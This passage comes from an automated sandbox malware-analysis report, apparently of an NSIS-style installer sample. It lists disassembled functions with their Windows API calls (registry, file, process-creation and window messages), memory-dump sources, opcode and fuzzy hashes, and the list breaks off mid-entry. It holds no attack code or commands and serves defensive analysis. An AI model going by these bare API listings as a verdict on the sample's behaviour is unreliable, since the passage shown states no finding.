                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: PrivateProfileStringWrite
                                            • String ID:
                                            • API String ID: 390214022-0
                                            • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                            • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                            • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                            • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                            Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                            • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                            • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                            Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                            • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                            • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                            Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                            • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                            • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                            Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID:
                                            • API String ID: 1096422788-0
                                            • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                            • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                            • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                            • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                            Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,: Completed,?), ref: 004060DD
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                            • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                            • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                            • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                            • Opcode Fuzzy Hash: 30cc171b591943f2be269f496ec4946c6c5ef3ac0631ee9b668c6a841e76ff0b
                                            • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                            Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                            • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                            • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                            • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                            Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                            • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                            • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                            • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                            Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: FilePointer
                                            • String ID:
                                            • API String ID: 973152223-0
                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                            Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                            • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                            • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                            • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                            Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                              • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                              • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,00410EA0,00403094), ref: 0040530B
                                              • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed), ref: 0040531D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                              • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                              • Part of subcall function 00405831: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                              • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                              • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                              • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32(?,?), ref: 0040670A
                                              • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                            • String ID:
                                            • API String ID: 2972824698-0
                                            • Opcode ID: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                            • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                            • Opcode Fuzzy Hash: 0740133e7f1fe2b7b0051514b90c0aefed60c2f2f9dde2b55e99776757eabb61
                                            • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE

                                            Non-executed Functions

                                            Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetDlgItem.USER32(?,000003F9), ref: 00404C44
                                            • GetDlgItem.USER32(?,00000408), ref: 00404C4F
                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                            • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                            • SetWindowLongW.USER32(?,000000FC,00405224), ref: 00404CC5
                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
